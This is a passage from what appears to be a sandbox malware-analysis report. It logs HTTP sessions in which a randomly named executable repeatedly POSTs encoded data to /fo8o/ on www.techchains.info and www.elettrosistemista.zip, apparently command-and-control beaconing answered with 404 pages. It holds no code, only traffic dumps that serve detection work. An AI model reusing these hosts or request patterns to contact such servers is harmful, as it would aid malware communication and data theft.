Jan 15, 2025 08:30:57.960477114 CET	790	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 213 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 70 6e 47 58 38 4c 33 70 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 49 74 71 7a 62 69 56 74 64 67 41 4d 61 68 6b 63 31 58 46 58 6a 46 4e 53 73 7a 55 6d 75 62 7a 39 48 6b 53 50 39 73 4e 6b 41 59 54 57 Data Ascii: pnGX8L3p=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXItqzbiVtdgAMahkc1XFXjFNSszUmubz9HkSP9sNkAYTW
Jan 15, 2025 08:30:58.598176003 CET	637	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 07:30:58 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49918	66.29.149.46	80	3328	C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 08:31:00.500895977 CET	814	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 237 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 70 6e 47 58 38 4c 33 70 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 74 51 73 78 4d 55 75 37 7a 58 46 6b 71 50 76 37 42 44 50 73 32 31 61 64 53 4f 32 35 32 66 72 47 63 45 4c 57 46 53 66 35 61 59 71 77 3d 3d Data Ascii: pnGX8L3p=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVtQsxMUu7zXFkqPv7BDPs21adSO252frGcELWFSf5aYqw==
Jan 15, 2025 08:31:01.115585089 CET	637	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 07:31:01 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49919	66.29.149.46	80	3328	C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 08:31:03.034581900 CET	1827	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1249 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 70 6e 47 58 38 4c 33 70 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 59 57 44 7a 38 46 78 30 5a 31 79 31 4d 79 36 68 4d 2f 74 4e 50 62 42 6b 57 4b 67 36 6b 30 57 39 43 68 53 39 58 52 2b 37 33 2f 71 56 59 78 49 79 30 52 52 4d 7a 73 32 41 2b 4f 70 6a 76 75 49 4d 42 4c 6f 72 56 6b 36 6f 46 50 36 58 70 72 6d 36 76 4c 47 41 37 30 34 44 55 69 68 38 49 33 67 74 6f 6b 32 42 34 6b 32 2b 74 4d 6e 77 59 73 75 2b 63 50 71 48 46 67 57 37 55 4a 4c 63 46 50 73 32 4a 52 65 73 48 2f 41 6f 64 63 65 67 61 43 4e 37 68 68 6f 75 43 35 5a 70 4a 45 73 48 45 69 58 [TRUNCATED] Data Ascii: pnGX8L3p=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNnYWDz8Fx0Z1y1My6hM/tNPbBkWKg6k0W9ChS9XR+73/qVYxIy0RRMzs2A+OpjvuIMBLorVk6oFP6Xprm6vLGA704DUih8I3gtok2B4k2+tMnwYsu+cPqHFgW7UJLcFPs2JResH/AodcegaCN7hhouC5ZpJEsHEiX7cgW7zuI60JeSi7X7an0pH15nEFNZASgOVRwKFkrNaE1wyZPPVcoETqEHFkiwQyoFxywvqC0x98C7vphzvMl4UgECr9egoFU931MrywlRSAvRkl0e8P11lRLj7GV76LpQF0Pibup/5EyCNfcqy3KyNvNQlrDySsuHSTnzn35//5EHg1Id9+xzb3N84ccRPci1sr11Sz1pxot0S1pzvIHPROmGpe/8E0AaJDSwmVzRef/T9hjapGA6qGEEDpeKNE5ez26JQFhPh5i9e+fT3yM9O8mqm12VMElzf+AfzUE530juFIlx6+dECOKyNlB2PpiPuOQi6iQXCgjxsCMuQyXyVkr33be3+V8yLwPjwsZ289Nr/FmWE4+zL/YgH9bJtGFY0u0sdyjWxeNX8j8mvAVJ97iJRUthMq3ithoqoWSmVpgo9LFAiXV+3ATFfTUp3M/ORdIL9W5HMEMYRQdrBC4xm7TOamhSpoJEOTq0vwLGb6ca/n8JXcuO0IG5Q6M4u4aa46BD16QyGPHviBQfNYSnFlpqI45i3PHCfdSuQdg89HWvbTyICgg/Zx6i5NjktnT7vfwIJ4eVtFbR6uYzM2Ytvr74YSLms1pfePUvoLxo0pFFKtcZXCBBCKQHqbVOEjBevjoA8SSOXD4v/RgXxjFG4JN1IW4EJ+TWb [TRUNCATED]
Jan 15, 2025 08:31:03.651276112 CET	637	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 07:31:03 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49920	66.29.149.46	80	3328	C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 08:31:05.565576077 CET	533	OUT	GET /fo8o/?pnGX8L3p=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5haoQH1WjEWithRFLxLKOV4ce9fWCCnKIVX4jHNmrNLQZpWctVBLU=&xZ4P=rRldwLg0ALTXzVV HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.techchains.info Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 15, 2025 08:31:06.171173096 CET	652	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 07:31:06 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49921	195.110.124.133	80	3328	C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 08:31:11.292511940 CET	808	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 213 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 70 6e 47 58 38 4c 33 70 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 69 69 31 55 77 34 49 32 58 75 43 48 37 6d 35 73 61 4e 51 5a 43 68 4c 45 2b 49 67 42 52 2f 6d 6a 2f 4a 7a 78 62 66 34 49 6f 66 65 4f Data Ascii: pnGX8L3p=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCii1Uw4I2XuCH7m5saNQZChLE+IgBR/mj/Jzxbf4IofeO
Jan 15, 2025 08:31:11.957542896 CET	367	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 07:31:11 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49922	195.110.124.133	80	3328	C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 08:31:13.841084957 CET	832	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 237 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 70 6e 47 58 38 4c 33 70 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 72 47 2b 4b 34 7a 52 66 6d 4a 39 4a 4c 78 4a 49 30 76 6e 72 37 74 6d 63 54 68 61 35 54 4d 6d 2f 61 58 70 78 52 76 58 56 35 58 67 67 3d 3d Data Ascii: pnGX8L3p=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6QxrG+K4zRfmJ9JLxJI0vnr7tmcTha5TMm/aXpxRvXV5Xgg==
Jan 15, 2025 08:31:14.503432989 CET	367	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 07:31:14 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49923	195.110.124.133	80	3328	C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 08:31:16.414741993 CET	1845	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1249 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 70 6e 47 58 38 4c 33 70 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 71 5a 30 32 56 74 57 4b 45 6d 4a 69 66 2f 6c 61 30 52 55 6f 71 73 39 59 75 50 4b 61 30 34 35 6f 58 44 76 4a 72 39 54 6f 4b 68 32 75 48 2b 75 48 5a 35 5a 30 73 63 30 74 4a 6f 45 30 54 52 4e 30 57 76 70 65 68 41 6a 6e 6c 71 37 46 73 4f 59 46 71 62 54 36 47 39 65 70 54 43 41 32 44 30 2b 48 4f 52 30 2f 61 35 73 62 33 65 54 58 39 46 58 6d 53 30 46 41 37 63 52 76 47 69 43 72 6e 69 79 61 79 78 6a 59 54 77 75 42 64 6d 69 42 56 62 6c 74 6d 7a 6b 6f 59 76 2f 6b 74 6a 34 2b 54 42 